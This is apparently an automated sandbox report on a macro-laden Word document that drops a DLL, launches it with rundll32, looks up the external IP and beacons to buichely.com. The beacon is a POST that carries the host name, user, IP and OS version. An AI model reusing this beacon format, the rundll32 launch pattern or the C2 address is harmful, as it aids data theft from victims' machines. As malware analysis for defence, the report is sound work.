Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 1, 2021, 2:16 p.m.	Sept. 1, 2021, 2:18 p.m.

Size	431.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: kell, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Aug 30 13:15:00 2021, Last Saved Time/Date: Mon Aug 30 13:15:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 19, Security: 0
MD5	`25d3ac93606e135f18e4e96887fa3a44`
SHA256	`686bc763ac5308fdcd85d9d1e4b6ef38cd2932797c60d8e7f0229621da8c7107`
CRC32	`358EB6F4`
ssdeep	`12288:cV9iQsDr8NnClDfKTFi1w06/vbOes1AOrk4M:cVXkr8NCNfKB30AOeso7`
Yara	Generic_Malware_Zero - Generic Malware Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Microsoft_Office_File_Zero - Microsoft Office File

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\0831_8300668682.doc
2488
- rundll32.exe rundll32 c:\users\test22\appdata\roaming\microsoft\templates\yefff.dll,QIHTXYFJRAN
  2128

Name	Response	Post-Analysis Lookup
buichely.com	A 185.230.91.127	185.230.91.127
api.ipify.org	A 54.235.247.117 A 54.235.244.43 CNAME nagano-19599.herokussl.com A 50.16.216.118 A 50.17.229.70 A 50.19.119.155 A 54.235.88.121 A 50.16.239.65 CNAME elb097307-934924932.us-east-1.elb.amazonaws.com A 23.21.173.155	54.235.88.121

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.230.91.127	Active	Moloch
54.235.247.117	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49176 -> 54.235.247.117:80	2021997	ET POLICY External IP Lookup api.ipify.org	Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA Sept. 1, 2021, 2:16 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 1, 2021, 2:16 p.m.			0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://buichely.com/8/forum.php

Performs some HTTP requests (2 events)

request	GET http://api.ipify.org/
request	POST http://buichely.com/8/forum.php

Sends data using the HTTP POST Method (1 event)

request

POST http://buichely.com/8/forum.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 68 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a85d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a46e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03c06000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03c06000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03c06000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03c06000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03c06000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03c06000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c33000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c33000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c33000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c33000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c33000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c33000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08c41000 process_handle: 0xffffffff	1

Looks up the external IP address (1 event)

domain

api.ipify.org

Creates (office) documents on the filesystem (2 events)

file	c:\Users\test22\AppData\Roaming\microsoft\templates\~$glib.doc
file	C:\Users\test22\AppData\Local\Temp\~$31_8300668682.doc

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\jjy.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\glib.doc.LNK

Creates hidden or system file (2 events)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Sept. 1, 2021, 2:16 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000004a4 filepath: C:\Users\test22\AppData\Local\Temp\~$31_8300668682.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$31_8300668682.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0
NtCreateFile Sept. 1, 2021, 2:16 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000668 filepath: c:\Users\test22\AppData\Roaming\microsoft\templates\~$glib.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\c:\users\test22\appdata\roaming\microsoft\templates\~$glib.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\glib.doc.LNK

Word document hooks document open

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 1, 2021, 2:16 p.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 1, 2021, 2:16 p.m.	flags: 0 family: 2	1	0	0

One or more non-whitelisted processes were created (1 event)

parent_process

winword.exe

martian_process

rundll32 c:\users\test22\appdata\roaming\microsoft\templates\yefff.dll,QIHTXYFJRAN

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (1 event)

Time & API	Arguments	Status	Return	Repeated
HttpSendRequestA Sept. 1, 2021, 2:16 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: GUID=8962251904648732308&BUILD=3008_hsdj8&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)	1	1	0

The process winword.exe wrote an executable file to disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\jjy.dll

0831_8300668682.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All